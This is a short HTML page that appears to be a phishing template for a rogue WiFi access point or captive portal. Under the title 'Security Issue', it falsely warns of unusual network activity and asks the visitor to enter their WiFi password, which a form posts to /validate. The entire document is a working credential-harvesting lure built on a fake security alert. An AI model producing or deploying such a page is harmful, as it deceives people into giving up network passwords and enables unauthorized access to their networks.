<!DOCTYPE html>
<html style="font-family: sans-serif;">
	<head>
		<title>Security Issue</title>
	</head>
	<body>
		<form method="post" action="/validate">
			<span style="font-size: 16px; text-align: center;">Unusual activity has been noticed on your network please enter your WiFi password to verify your identity.</span>
			<form action="/validate">
				<input type="password" name="pword" placeholder="Password">
				<input type="submit" value="Submit">
			</form>
		</form>
	</body>
</html>
